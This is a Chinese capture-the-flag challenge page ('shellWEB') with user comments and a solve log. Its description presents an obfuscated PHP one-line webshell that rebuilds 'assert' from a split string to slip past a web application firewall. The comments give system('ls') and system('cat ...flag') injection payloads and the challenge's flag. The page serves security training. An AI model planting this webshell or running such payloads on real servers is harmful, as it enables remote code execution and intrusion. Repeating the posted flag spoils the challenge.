shellWEB 未解决

分数: 25 金币: 3
题目作者: harry
一  血: dotast
一血奖励: 1金币
解  决: 3858
提  示:
描  述:
送给大家一个过狗一句话 $poc="a#s#s#e#r#t"; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s'])
评论
15614005380 4小时前

环境没坏,看描述和题目名做题。

回复 0

GET-lee 15小时前

简单到不敢相信

回复 0

淮南 2月前

环境打不开 退钱!!!

回复 0

淮南 2月前

环境有问题

回复 0

小白菜. 3月前

后悔做之前没看评论区,rnm,退钱

回复 0

falg 4月前

就是一般的命令执行,先拿到index.php然后后面?s=system("ls")查看flaga15808abee46a1d5.txt文件,接着?s=system("cat ./flaga15808abee46a1d5.txt")得到flag

回复 1

bt7274 6月前

assert($_GET['s'])

回复 0

04secbug 7月前

s=system('ls') s=system('cat flag')

回复 0

JJhello 8月前

rnm,退钱

回复 2

wxy1343 8月前

flag{5104494e7b5ec21c02e3d1c5985a4e89}

回复 0

WriteUp

image
harry

3 金币

评分(4)

解题动态

15614005380 攻破了该题 4小时前
Oranine 攻破了该题 8小时前
jia3833212 攻破了该题 8小时前
GET-lee 攻破了该题 15小时前
tander 攻破了该题 1天前
NL1e 攻破了该题 2天前
落月1122 攻破了该题 3天前
lqn15254976927 攻破了该题 5天前
Daniel2023 攻破了该题 6天前
edcrfvtgb 攻破了该题 6天前
reechee 攻破了该题 6天前
19957424075 攻破了该题 7天前
YideBugku 攻破了该题 8天前
麻花不花 攻破了该题 9天前
Ray1900 攻破了该题 10天前
livaithan 攻破了该题 15天前
qf77 攻破了该题 15天前
Xeon 攻破了该题 15天前
ETERNAL1024 攻破了该题 19天前
孤岛蓝鲸 攻破了该题 20天前